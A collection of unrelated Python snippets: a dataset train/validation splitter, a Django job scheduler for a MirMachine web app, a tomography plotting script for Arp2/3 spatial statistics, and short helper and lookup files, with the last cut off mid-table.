            .format("\n".join(sources_to_abs_path(missing_sources))),
        )
    nonexistent_sources = expected_sources - actual_sources
    if nonexistent_sources:
        print(
            '\nSource files listed in "sources" parameter but not found:\n{}\n'.
            format("\n".join(sources_to_abs_path(nonexistent_sources))),
        )

    return 1

if __name__ == "__main__":
    sys.exit(main())
| StarcoderdataPython |
3385413 | import os
import argparse
import random
import shutil
from shutil import copyfile
def printProgressBar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█'):
    """
    Render a one-line terminal progress bar, redrawing in place.

    @params:
        iteration - Required : current iteration (Int)
        total     - Required : total iterations (Int)
        prefix    - Optional : prefix string (Str)
        suffix    - Optional : suffix string (Str)
        decimals  - Optional : positive number of decimals in percent complete (Int)
        length    - Optional : character length of bar (Int)
        fill      - Optional : bar fill character (Str)
    """
    # percent complete, formatted to the requested number of decimals
    done = "{0:.{1}f}".format(100 * (iteration / float(total)), decimals)
    # how many bar cells are filled at this iteration
    n_filled = int(length * iteration // total)
    progress = fill * n_filled + '-' * (length - n_filled)
    # '\r' keeps the cursor on the same line so the bar overwrites itself
    print('\r{0} |{1}| {2}% {3}'.format(prefix, progress, done, suffix), end='\r')
    # Print New Line on Complete
    if iteration == total:
        print()
def rm_mkdir(dir_path):
    """Recreate dir_path as an empty directory, discarding any previous contents."""
    # wipe whatever is currently at the path (directory tree), then recreate it
    already_present = os.path.exists(dir_path)
    if already_present:
        shutil.rmtree(dir_path)
        # print('Remove path - %s'%dir_path)
    os.makedirs(dir_path)
    # print('Create path - %s'%dir_path)
def main(config):
    """Split the origin image/ground-truth dataset into train and valid sets.

    Recreates the four output directories, scans config.origin_data_path for
    .png files, shuffles them, and copies train_ratio / valid_ratio fractions
    (with their matching ground-truth files) into the train and valid folders.
    """
    # start from empty output directories every run
    rm_mkdir(config.trainrgb)
    rm_mkdir(config.trainannot)
    rm_mkdir(config.validannot)
    rm_mkdir(config.validrgb)
    # rm_mkdir(config.test_path)
    # rm_mkdir(config.test_GT_path)

    filenames = os.listdir(config.origin_data_path)
    data_list = []
    GT_list = []

    for filename in filenames:
        ext = os.path.splitext(filename)[-1]  # extract the filename's extension
        if ext == '.png':
            # keep only the part after the last '_' as the canonical name;
            # assumes image and ground-truth files share this suffix — TODO confirm
            filename = filename.split('_')[-1][:-len('.png')]
            data_list.append(filename + '.png')
            GT_list.append(filename + '.png')

    # split sizes derived from the configured ratios
    num_total = len(data_list)
    num_train = int((config.train_ratio / (config.train_ratio + config.valid_ratio )) * num_total)
    num_valid = int((config.valid_ratio / (config.train_ratio + config.valid_ratio )) * num_total)
    # num_test = num_total - num_train - num_valid

    print('\nNum of train set : ', num_train)
    print('\nNum of valid set : ', num_valid)
    # print('\nNum of test set : ', num_test)

    # shuffled index list; pop() draws a random file for each split
    Arange = list(range(num_total))
    random.shuffle(Arange)

    for i in range(num_train):
        idx = Arange.pop()

        # copy the selected image into the train folder
        src = os.path.join(config.origin_data_path, data_list[idx])
        dst = os.path.join(config.trainrgb, data_list[idx])
        copyfile(src, dst)

        # copy the matching ground-truth file into the train-GT folder
        src = os.path.join(config.origin_GT_path, GT_list[idx])
        dst = os.path.join(config.trainannot, GT_list[idx])
        copyfile(src, dst)

        printProgressBar(i + 1, num_train, prefix='Producing train set:', suffix='Complete', length=50)

    for i in range(num_valid):
        idx = Arange.pop()

        # copy the selected image into the valid folder
        src = os.path.join(config.origin_data_path, data_list[idx])
        dst = os.path.join(config.validrgb, data_list[idx])
        copyfile(src, dst)

        # copy the matching ground-truth file into the valid-GT folder
        src = os.path.join(config.origin_GT_path, GT_list[idx])
        dst = os.path.join(config.validannot, GT_list[idx])
        copyfile(src, dst)

        printProgressBar(i + 1, num_valid, prefix='Producing valid set:', suffix='Complete', length=50)

    # test-set generation, currently disabled
    # for i in range(num_test):
    #     idx = Arange.pop()
    #     src = os.path.join(config.origin_data_path, data_list[idx])
    #     dst = os.path.join(config.test_path, data_list[idx])
    #     copyfile(src, dst)
    #     src = os.path.join(config.origin_GT_path, GT_list[idx])
    #     dst = os.path.join(config.test_GT_path, GT_list[idx])
    #     copyfile(src, dst)
    #
    #     printProgressBar(i + 1, num_test, prefix='Producing test set:', suffix='Complete', length=50)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()

    # split ratios (normalised against each other inside main)
    parser.add_argument('--train_ratio', type=float, default=0.9)
    parser.add_argument('--valid_ratio', type=float, default=0.1)
    # parser.add_argument('--test_ratio', type=float, default=0.05)

    # data paths: origin inputs and the train/valid output folders
    parser.add_argument('--origin_data_path', type=str,
                        default='/home/zhouyilong/dataset/2/img')
    parser.add_argument('--origin_GT_path', type=str,
                        default='/home/zhouyilong/dataset/2/groundtruth')
    parser.add_argument('--trainrgb', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/trainrgb')
    parser.add_argument('--trainannot', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/trainannot')
    parser.add_argument('--validrgb', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/valrgb')
    parser.add_argument('--validannot', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/valannot')
    # parser.add_argument('--test_path', type=str, default='/home/zhouyilong/github/R2AttU_Net/data/test/')
    # parser.add_argument('--test_GT_path', type=str, default='/home/zhouyilong/github/R2AttU_Net/data/test_GT/')

    config = parser.parse_args()
    print(config)
    main(config)
15596 | <gh_stars>1-10
from ..models import Job
from engine.scripts.mirmachine_args import run_mirmachine
from .socket_helper import announce_status_change, announce_queue_position, announce_initiation, announce_completed
from .maintainer import clean_up_temporary_files
from django.utils import timezone
from MirMachineWebapp import user_config as config
def schedule_job(stop):
    """Run the oldest queued Job, then recurse to process the next one.

    Does nothing while another job is already 'ongoing'.  When the queue is
    empty, optionally cleans up temporary files and returns.  `stop` is
    forwarded to run_mirmachine; presumably a stop/abort signal for the
    worker thread — TODO confirm.
    """
    ongoing = Job.objects.filter(status='ongoing')
    # check if already job running
    if ongoing.exists():
        return
    queued = Job.objects.filter(status='queued').order_by('initiated')
    # check if queue is empty; the idle moment is used for housekeeping
    if not queued.exists():
        if config.AUTO_CLEANUP_TEMP_FILES:
            clean_up_temporary_files()
        return
    # promote the oldest queued job to 'ongoing' and broadcast the change
    next_in_line = queued[0]
    next_in_line.status = 'ongoing'
    next_in_line.initiated = timezone.now()
    next_in_line.save()
    announce_status_change(next_in_line)
    announce_initiation(next_in_line)
    # announce the (1-based) queue position of each still-queued job.
    # NOTE(review): `queued` is a lazy queryset, so it should re-evaluate
    # here without the job just promoted above — confirm.
    for i in range(len(queued)):
        announce_queue_position(queued[i], i+1)
    try:
        process, job_object = run_mirmachine(next_in_line, stop)
        handle_job_end(process, job_object)
    except OSError:
        # the worker process could not be started: mark the job halted
        next_in_line.status = 'halted'
        next_in_line.save()
        announce_status_change(next_in_line)
    except RuntimeError:
        # interruption requested; do not recurse into the next job
        print('Interrupted, exiting thread')
        return
    # process the next queued job (if any) once this one has finished
    schedule_job(stop)
def handle_job_end(process, job_object):
    """Record the outcome of a finished worker process on its Job row.

    A non-zero return code marks the job 'halted', otherwise 'completed'.
    The completion timestamp is recorded in either case — TODO confirm
    that 'halted' jobs are also meant to get a `completed` time.
    """
    if process.returncode != 0:
        job_object.status = 'halted'
    else:
        job_object.status = 'completed'
    job_object.completed = timezone.now()
    job_object.save()
    # notify listeners of the final state
    announce_completed(job_object)
    announce_status_change(job_object)
| StarcoderdataPython |
11379460 | from .argmax import argmax
from .converter import convert_str_to_datetime, convert_datetime_to_str
from .cumsum import cumsum
from .fillna import fillna
from .math import multiply, divide, add, subtract
from .melt import melt
from .percentage import percentage
from .pivot import pivot, pivot_by_group
from .query_df import query, query_df
from .rank import rank
from .rename import rename
from .replace import replace
from .sort import sort_values
from .top import top
from .waterfall import waterfall
| StarcoderdataPython |
8055414 | """
Generate graphs with results for Arp2/3 project
Input: - 2nd order results for W and IT
- 1st order results for W and IT
Output: - Plots with the results
"""
################# Package import
import os
import pickle
import numpy as np
import scipy as sp
import sys
import time
from surf_dst import pexceptions, sub, disperse_io, surf
from surf_dst.globals import unpickle_obj, sort_dict
from surf_dst.surf.model import ModelCSRV
from surf_dst.surf.utils import list_tomoparticles_pvalues
from surf_dst.spatial.sparse import compute_hist
from matplotlib import pyplot as plt, rcParams
###### Global variables
__author__ = '<NAME>'
BAR_WIDTH = .35
rcParams['axes.labelsize'] = 20
rcParams['xtick.labelsize'] = 20
rcParams['ytick.labelsize'] = 20
########################################################################################
# PARAMETERS
########################################################################################
ROOT_PATH = '/fs/pool/pool-lucic2/antonio/tomograms/marion/Arp23complex'
# Input STAR files
in_star_w = ROOT_PATH + '/ltomos_all/W_all_mask/W_all_mask_ltomos.star'
in_star_it = ROOT_PATH + '/ltomos_all/IT_all_mask/IT_all_mask_ltomos.star'
# Input matrices (optional - organization analysis is skipped)
in_mats_w2nd = ROOT_PATH + '/uni_sph_all_W/W_all_sim200_org_lists.pkl'
in_mats_it2nd = ROOT_PATH + '/uni_sph_all_IT/IT_all_sim200_org_lists.pkl'
in_sims_w2nd = ROOT_PATH + '/uni_sph_all_W/W_all_sim200_org_sims.pkl'
in_sims_it2nd = ROOT_PATH + '/uni_sph_all_IT/IT_all_sim200_org_sims.pkl'
in_mats_w1st = ROOT_PATH + '/uni_sph_1st_all_W/W_all_sim20_wspace.pkl'
in_mats_it1st = ROOT_PATH + '/uni_sph_1st_all_IT/IT_all_sim20_wspace.pkl'
# Output directory
out_dir = ROOT_PATH + '/plots'
# Analysis variables
ana_res = 1.684 # nm/voxel
ana_rg = np.arange(5, 1100, 10) # np.arange(5, 800, 10) # np.arange(4, 100, 2) # in nm
# P-value computation settings
# Simulation model (currently only CSRV)
p_per = 1 # 5 # %
# Firts order analysis
ana_nbins = 20
ana_rmax = 200
# Figure saving options
fig_fmt = '.png' # if None they showed instead
# Plotting options
pt_xrange = [0, 1100] # [0, 800]
pt_dxrange = [0, 380]
pt_yrange = [-25, 25]
pt_cmap = plt.get_cmap('gist_rainbow')
###### Additional functionality
# Computes IC from a matrix of measurements (n_arrays, array_samples)
def compute_ic(per, sims):
    """Compute the confidence-interval envelope of a set of measurement arrays.

    :param per: lower percentile (the upper bound uses 100 - per)
    :param sims: 2-D array shaped (n_arrays, array_samples); a 1-D array is
                 treated as a single realisation
    :return: (ic_low, ic_med, ic_high) percentile curves along axis 0
    """
    # A 1-D input holds a single realisation: no spread to summarise,
    # so all three outputs are the data array itself.
    if len(sims.shape) == 1:
        return sims, sims, sims
    # 'linear' is numpy's default interpolation, so the keyword (deprecated
    # and renamed 'method'; removed in NumPy 2.0) is simply omitted here.
    ic_low = np.percentile(sims, per, axis=0)
    ic_med = np.percentile(sims, 50, axis=0)
    ic_high = np.percentile(sims, 100 - per, axis=0)
    return ic_low, ic_med, ic_high
# Computes pvalue from a matrix of simulations (n_arrays, array_samples)
def compute_pvals(exp_med, sims):
n_sims = float(sims.shape[0])
p_vals_low, p_vals_high = np.zeros(shape=exp_med.shape, dtype=np.float32), \
np.zeros(shape=exp_med.shape, dtype=np.float32)
for i, exp in enumerate(exp_med):
sim_slice = sims[:, i]
p_vals_high[i] = float((exp > sim_slice).sum()) / n_sims
p_vals_low[i] = float((exp < sim_slice).sum()) / n_sims
return p_vals_low, p_vals_high
########################################################################################
# MAIN ROUTINE
########################################################################################
print '\tLoading input STAR file...'
star_w, star_it = sub.Star(), sub.Star()
try:
star_w.load(in_star_w)
star_it.load(in_star_it)
except pexceptions.PySegInputError as e:
print 'ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"'
print 'Terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
set_lists_w, set_lists_it = surf.SetListTomoParticles(), surf.SetListTomoParticles()
for row in range(star_w.get_nrows()):
ltomos_pkl = star_w.get_element('_psPickleFile', row)
ltomos = unpickle_obj(ltomos_pkl)
set_lists_w.add_list_tomos(ltomos, ltomos_pkl)
for row in range(star_it.get_nrows()):
ltomos_pkl = star_it.get_element('_psPickleFile', row)
ltomos = unpickle_obj(ltomos_pkl)
set_lists_it.add_list_tomos(ltomos, ltomos_pkl)
print '\tComputing densities...'
dens_w = np.asarray(set_lists_w.density_by_tomos(surface=False).values(), dtype=float)
dens_it = np.asarray(set_lists_it.density_by_tomos(surface=False).values(), dtype=float)
means = np.asarray((dens_w.mean(), dens_it.mean()))
stds = np.asarray((dens_w.std()/np.sqrt(float(dens_w.shape[0])), dens_it.std()/np.sqrt(float(dens_it.shape[0]))))
plt.figure()
plt.ylabel('Density [particles/nm$^3$]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.bar(0.25, means[0], 0.5, color='orange', yerr=stds[0], ecolor='k', linewidth=4, error_kw={'elinewidth':4, 'capthick':4})
plt.bar(1.25, means[1], 0.5, color='springgreen', yerr=stds[1], ecolor='k', linewidth=4, error_kw={'elinewidth':4, 'capthick':4})
plt.xticks((0.5, 1.5), ('W', 'IT'))
plt.xlim(0, 2)
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IT_density' + fig_fmt, dpi=600)
plt.close()
print '\tPickling input matrices...'
if in_mats_w2nd is not None:
with open(in_mats_w2nd, 'r') as pkl:
mats_w2nd = pickle.load(pkl)
if in_mats_it2nd is not None:
with open(in_mats_it2nd, 'r') as pkl:
mats_it2nd = pickle.load(pkl)
if in_sims_w2nd is not None:
with open(in_sims_w2nd, 'r') as pkl:
sims_w2nd = pickle.load(pkl)
if in_sims_it2nd is not None:
with open(in_sims_it2nd, 'r') as pkl:
sims_it2nd = pickle.load(pkl)
if mats_w2nd is not None:
plt.figure()
plt.ylabel('<NAME>')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='W-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IC-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, 10, y_max))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_RipleyL' + fig_fmt, dpi=600)
plt.close()
flt_ncoefs = 9
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
mat = sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='W-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
ic_low = sp.signal.savgol_filter(ic_low, flt_ncoefs, 2, mode='interp')
ic_med = sp.signal.savgol_filter(ic_med, flt_ncoefs, 2, mode='interp')
ic_high = sp.signal.savgol_filter(ic_high, flt_ncoefs, 2, mode='interp')
ic_low_5 = sp.signal.savgol_filter(ic_low_5, flt_ncoefs, 2, mode='interp')
ic_high_95 = sp.signal.savgol_filter(ic_high_95, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IC-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, 10, y_max))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_RipleyL_sgflt' + fig_fmt, dpi=600)
plt.close()
plt.figure()
plt.ylabel('Ripley\'s L\'')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
mat = np.gradient(sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp'), ana_rg[1]-ana_rg[0])
ana_rg_c = ana_rg[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
mat_c = mat[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
plt.plot(ana_rg_c, mat_c, linewidth=3, color='blue', label='W-experimental')
x_min, y_min = ana_rg_c[mat_c.argmin()], mat_c.min()
plt.plot((x_min, x_min), (-.1, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_min), (y_min, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, 100, x_min, 250))
plt.yticks((-.1, y_min, 0, .2, .4))
if pt_xrange is not None:
plt.xlim(pt_dxrange)
if pt_yrange is not None:
plt.ylim((-.1, .5))
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_RipleyL_sgdif' + fig_fmt, dpi=600)
plt.close()
else:
print 'ERROR: organization could not be computed'
print 'Unsuccessfully terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
if mats_it2nd is not None:
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='IT-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IT-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, y_max, 20))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_RipleyL' + fig_fmt, dpi=600)
plt.close()
flt_ncoefs = 9
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
mat = sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='W-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
ic_low = sp.signal.savgol_filter(ic_low, flt_ncoefs, 2, mode='interp')
ic_med = sp.signal.savgol_filter(ic_med, flt_ncoefs, 2, mode='interp')
ic_high = sp.signal.savgol_filter(ic_high, flt_ncoefs, 2, mode='interp')
ic_low_5 = sp.signal.savgol_filter(ic_low_5, flt_ncoefs, 2, mode='interp')
ic_high_95 = sp.signal.savgol_filter(ic_high_95, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IC-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, 10, y_max))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_RipleyL_sgflt' + fig_fmt, dpi=600)
plt.close()
plt.figure()
plt.ylabel('Ripley\'s L\'')
plt.xlabel('Distance [nm]')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
mat = np.gradient(sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp'), ana_rg[1]-ana_rg[0])
ana_rg_c = ana_rg[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
mat_c = mat[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
plt.plot(ana_rg_c, mat_c, linewidth=3, color='blue', label='W-experimental')
x_min, y_min = ana_rg_c[mat_c.argmin()], mat_c.min()
plt.plot((x_min, x_min), (-.1, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_min), (y_min, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, 100, x_min, 250))
plt.yticks((-.1, y_min, 0, .2, .4))
if pt_xrange is not None:
plt.xlim(pt_dxrange)
if pt_yrange is not None:
plt.ylim((-.1, .5))
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_RipleyL_sgdif' + fig_fmt, dpi=600)
plt.close()
else:
print 'ERROR: organization could not be computed'
print 'Unsuccessfully terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
if (mats_w2nd is not None) and (mats_it2nd is not None):
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=4, color='orange', label='W-experimental')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=4, color='springgreen', label='IT-experimental')
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IT_RipleyL' + fig_fmt, dpi=600)
plt.close()
else:
print 'ERROR: organization could not be computed'
print 'Unsuccessfully terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
print '\nLoading 1st order analysis...'
with open(in_mats_w1st, 'r') as pkl:
wspace = pickle.load(pkl)
lists_count_w, tomos_count_w = wspace[0], wspace[1]
lists_hash_w, tomos_hash_w = wspace[2], wspace[3]
tomos_exp_dsts_w, tomos_sim_dsts_w, tomos_exp_fdsts_w, tomos_sim_fdsts_w = wspace[4], wspace[5], wspace[6], wspace[7]
lists_exp_dsts_w, lists_sim_dsts_w, lists_exp_fdsts_w, lists_sim_fdsts_w, lists_color_w = wspace[8], wspace[9], wspace[10], wspace[11], wspace[12]
with open(in_mats_it1st, 'r') as pkl:
wspace = pickle.load(pkl)
lists_count_it, tomos_count_it = wspace[0], wspace[1]
lists_hash_it, tomos_hash_it = wspace[2], wspace[3]
tomos_exp_dsts_it, tomos_sim_dsts_it, tomos_exp_fdsts_it, tomos_sim_fdsts_it = wspace[4], wspace[5], wspace[6], wspace[7]
lists_exp_dsts_it, lists_sim_dsts_it, lists_exp_fdsts_it, lists_sim_fdsts_it, lists_color_it = wspace[8], wspace[9], wspace[10], wspace[11], wspace[12]
print '\t\t-Plotting Histogram...'
ltomo = lists_exp_dsts_w.values()[0]
hist_bins, hist_vals_w = compute_hist(np.concatenate(np.asarray(ltomo)), ana_nbins, ana_rmax)
list_sim_dsts = lists_sim_dsts_w.values()[0]
sims_hist_vals = list()
for sim_dsts in list_sim_dsts:
sims_hist_vals.append(compute_hist(sim_dsts, ana_nbins, ana_rmax)[1])
if len(sims_hist_vals) > 0:
ic_low, ic_med, ic_high = compute_ic(p_per, np.asarray(sims_hist_vals))
plt.figure()
# plt.ylabel('Nearest neighbor distribution')
plt.ylabel('Nearest Neighbor Probability')
plt.xlabel('Distance [nm]')
plt.plot(hist_bins, hist_vals_w, color='blue', linewidth=2, label='W-experimental', marker='o')
plt.plot(hist_bins, ic_med, 'gray', linewidth=2, label='W-simulated')
plt.fill_between(hist_bins, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
plt.xlim(0, ana_rmax)
plt.ylim(0, 0.035)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_histogram' + fig_fmt)
plt.close()
print '\t\t-Plotting Histogram...'
ltomo = lists_exp_dsts_it.values()[0]
hist_bins, hist_vals_it = compute_hist(np.concatenate(np.asarray(ltomo)), ana_nbins, ana_rmax)
list_sim_dsts = lists_sim_dsts_it.values()[0]
sims_hist_vals = list()
for sim_dsts in list_sim_dsts:
sims_hist_vals.append(compute_hist(sim_dsts, ana_nbins, ana_rmax)[1])
if len(sims_hist_vals) > 0:
ic_low, ic_med, ic_high = compute_ic(p_per, np.asarray(sims_hist_vals))
plt.figure()
plt.ylabel('Nearest Neighbor Probability')
plt.xlabel('Distance [nm]')
plt.plot(hist_bins, hist_vals_it, color='blue', linewidth=2, label='IT-experimental', marker='o')
plt.plot(hist_bins, ic_med, 'gray', linewidth=2, label='IT-simulated')
plt.fill_between(hist_bins, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
plt.xlim(0, ana_rmax)
plt.ylim(0, 0.035)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_histogram' + fig_fmt)
plt.close()
plt.figure()
plt.ylabel('Nearest Neighbor Probability')
plt.xlabel('Distance [nm]')
plt.plot(hist_bins, hist_vals_w, color='blue', linestyle='-', marker='o', linewidth=2, label='W-experimental')
plt.plot(hist_bins, hist_vals_it, color='blue', linestyle='--', marker='s', linewidth=2, label='IT-experimental')
plt.xlim(0, ana_rmax)
plt.xticks(hist_bins)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IT_histogram' + fig_fmt)
plt.close()
plt.figure()
plt.ylabel('Probability')
plt.xlabel('Nearest Neighbor Distance [nm]')
H, B = np.histogram(np.concatenate(np.asarray(lists_exp_dsts_w.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=True)
plt.bar(B[:-1], 10.*H, width=10, color='b', linewidth=2)
# plt.hist(np.concatenate(np.asarray(lists_exp_dsts_w.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=10)
# plt.plot(hist_bins, hist_vals_w, color='blue', linestyle='-', marker='o', linewidth=2, label='W-experimental')
# plt.xlim(0, ana_rmax)
# plt.ylim(0, 0.02)
# plt.xticks(hist_bins)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_histogram' + fig_fmt)
plt.close()
plt.figure()
plt.ylabel('Probability')
plt.xlabel('Nearest Neighbor Distance [nm]')
H, B = np.histogram(np.concatenate(np.asarray(lists_exp_dsts_it.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=True)
plt.bar(B[:-1], 10.*H, width=10, color='b', linewidth=2)
# plt.hist(np.concatenate(np.asarray(lists_exp_dsts_it.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=10)
# plt.plot(hist_bins, hist_vals_it, color='blue', linestyle='-', marker='s', linewidth=2, label='IT-experimental')
# plt.xlim(0, ana_rmax)
# plt.ylim(0, 0.02)
# plt.xticks(hist_bins)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_histogram' + fig_fmt)
plt.close()
print 'Successfully terminated. (' + time.strftime("%c") + ')'
| StarcoderdataPython |
# Lookup tables mapping form option codes (string keys) to display labels
# for a Ho Chi Minh City real-estate listing app.
# Fix: the first line was corrupted by dataset residue ('6404997 | ') that
# made the module a syntax error.

# Districts 1-12; the label is derived directly from the code.
address_district = {str(i): 'District {}'.format(i) for i in range(1, 13)}

# Street names (Vietnamese), keyed by option code.
address_street = {
    '1': 'Cao Thắng',
    '2': 'Lý Thường Kiệt',
    '3': 'Phạm Văn Đồng',
